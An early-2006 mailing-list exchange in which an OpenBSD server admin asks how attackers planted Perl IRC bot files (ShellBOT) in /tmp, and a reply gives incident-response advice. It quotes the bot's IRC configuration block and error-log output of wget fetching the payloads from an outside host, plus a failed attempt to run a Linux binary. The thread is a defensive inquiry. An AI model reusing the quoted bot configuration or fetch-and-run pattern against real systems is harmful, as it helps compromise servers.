Hi,
Standard advise is to reinstall the o/s (3.8 ? ;-) and then _data_
only from know good backup. You could use a boot cdrom & dd off an
image of the disk for later analysis if you want first.
Is there some attack vector like php or such available on the
machine ? maybe they used that to retrieve & write the file ? ... but
access to /tmp is tricky from a chrooted httpd !
/Pete
On 4. jan. 2006, at 15.50, Gaby vanhegan wrote:
To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173
i386.
I have some suspect files in /tmp, and I'm fairly sure that they
shouldn't be there. Only thing I can't twig is what method the
attackers used to get the files into that directory. The files are:
################################### Microsoft Search Worm - by br0k3d
###########################################
#### ##### From the same author of LinuxDay Worm and
other variants #### #######
And:
# ShellBOT
# 0ldW0lf - [EMAIL PROTECTED]
# - www.atrix-br.cjb.net
# - www.atrix.cjb.net
in /tmp/.cpanel and /tmp/.cpanel.tmp. Reading them through, they
just look like IRC clients written in Perl that have some remote
commands for DOS, and the likes. They connect to a chatroom and
print some message or other. If anybody wants to have some fun, the
main config block is:
# IRC
my @adms=("darkwoot", "br0k3d", "vipzen", "Nandokabala"); #nick dos
administradores
my @canais=("#gestapo");
my $nick='ADOLFHITLER'; # nick do bot.. c o nick jah estiveh em uso..
vai aparece com um numero radonamico no final
my $ircname = 'SSSA';
chop (my $realname = `uname -a`);
$servidor='irc.agitamanaus.net' unless $servidor; #servidor d irc q
vai c usadu c naum for especificado no argumento
my $porta='6667'; #porta do servidor d irc
My question is how did these files get into the machine. I have
entries in the httpd error log that look like this:
--05:10:47-- http://arnold.dvclub.com.hk/phpBB2/linuxday.txt
=> `/tmp/.cpanel'
Resolving arnold.dvclub.com.hk... done.
Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... connected.
HTTP request sent, awaiting response... --05:10:57-- http://
arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt
=> `/tmp/.cpanel.tmp'
Resolving arnold.dvclub.com.hk... done.
Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... failed:
Connection timed out.
Retrying.
--05:12:13-- http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt
(try: 2) => `/tmp/.cpanel.tmp'
Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... 200 OK
Length: 3,355 [text/plain]
0K ... 100%
468.05 KB/s
05:12:27 (468.05 KB/s) - `/tmp/.cpanel' saved [3355/3355]
So something is clearly injecting a command into a script, and it is
causing wget to run and fetch some files. There are more instances
of the same thing, but they're all fetching a file from the same
place (either .cpanel, .cpanel.tmp or .plesk).
Because they're in the default Apache error log, the attacker must
have hit a website on the machine that doesn't have an ErrorLog
defined, or they hit the machine by IP instead of a hostname. I got
a list of sites that have no error log (and would log to /var/www/
logs/error_log) and checked their transfer logs. None of them had
any entries in them that correspond to any of the times on the wget
entries, so I learn nothing from this. There are earlier entries as
well, doing the same thing, but to a different site
I'm going to do a bulk grep on all the web server logs to see if
anything about wget turns up in any of them, and if I can then work
out which script on which site is causing the problem. As far as I
can tell, there is no damage, but there are some entries like these
in the error logs:
/tmp/x44423[1]: ^?ELF^A^A^ALinux^B^C^A<80><80>^44: not found
/tmp/x44423[2]: 1?X<89>?<8D>T<81>^DP<83>??RQ??^A?: not found
/tmp/x44423[4]: syntax error: `(' unexpected
Am I right in thinking that these entries show somebody trying to run
a Linux binary unsuccessfully? Good job I leave Linux emulation
turned off... :)
So, what's my next move? My daily/weekly security emails show
nothing to be worried about, no changes to any system critical files
or anything of that ilk. Where can I look for more information or
clues? I know the machine is due for an upgrade, and that's next on
my list. I would provide a dmesg but the machine has been up for a
while with one full disk, so it's been pushed out of the end of the
dmesg file.
Gaby
--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/
